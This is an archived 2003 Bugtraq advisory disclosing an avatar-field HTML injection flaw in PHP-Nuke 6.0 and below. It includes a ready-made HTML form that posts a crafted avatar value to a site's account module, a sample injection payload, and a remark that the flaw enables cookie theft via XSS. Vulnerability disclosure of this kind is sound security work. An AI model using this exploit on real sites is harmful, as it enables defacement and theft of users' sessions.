PHP-Nuke Avatar Code injection vulnerability

From: delusion (delusi0n@bellsouth.net)
Date: 02/03/03

  • Next message: jelmer: "internet explorer local file reading"
    From: "delusion" <delusi0n@bellsouth.net>
    To: <bugtraq@securityfocus.com>
    Date: Mon, 3 Feb 2003 05:54:59 -0500
    
    

    -------------------------------------------

    Affected Versions:
    PHP Nuke versionh 6.0 and below

    Unaffected version:
    PHP Nuke 6.5

    Impact:
    -------------------------------------------
    Allows any user to inject their own HTML or Java code instead of an avatar
    image. This can lead to very annoying forum posts, and the usual XSS tricks.

    Summary:
    -------------------------------------------
    When users sign up, they are asked to select an avatar from a list of
    available avatars in the website's /images/forum/avatars folder. When PHP
    Nuke inserts the image name of the selected avatar into the database, it
    does not perform any tag or code checks. So therefore if a user gets the
    site's <form> code and changes the avatar <select> box into a text box, he
    can enter HTML or java code which will be entered into the database and
    displayed wherever the avatar is shown. This can lead to very annoying forum
    posts, and to the theft of users' cookies using XSS.

    Exploit:
    -------------------------------------------
    After you register on the vulnerable PHP Nuke site, login, then on the "Your
    Account" page click "Your Info", view source, then search for "uid", you
    should find something like this..

    <input type="hidden" name="uid" value="2273">

    The number you see for value, is your user id. After you got your user id,
    Launch this html code.. (make sure u change http://NUKESITE to the url of
    the vulnerable site)

    <!-- START CODE --!>
    <form name="Register"
    action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">

    <b>Code ('">[code]<b ')</b><input type="text" name="user_avatar" size="30"
    maxlength="30"><br><br>

    <b>Username</b><input type="text" name="uname" size="30"
    maxlength="255"><br><b>User ID:<input type="text" name="uid"
    size="30"><input type="hidden" name="op" value="saveuser"><input
    type="submit" value="Save Changes"></form>
    <!-- END CODE --!>

    When you launch it, type in your code, which must start with `">`. it doesnt
    matter how it ends, you can put a '<b ' at the end, so you dont get any
    broken code. Type in your username and user ID, then click submit, and u
    will be taken to the "Your Account" page on the vulnerable Nuked site. At
    this point you should be able to see the result of your code. Now anywhere
    that your avatar will be used, it will execute the code. ;)

    BTW the code you put in can only be 30 characters long due to the field's
    specified length in the database.

    heres a sample of what u can enter..

    "><h1>TESTING</h1><b

    That will cause "TESTING" to appear in big letters wherever your avatar is
    used.

    There is a space after "<b" so make sure to put that in, or u will get ugly
    broken code. ;)

    Solution:
    -------------------------------------------
    None as of yet.. If someone can please post a good solution it would be
    appreciated.

    -------------------------------------------

    Another Vulnerability Brought to you by,
    delusion
    http://www.digital-delusions.com



    Relevant Pages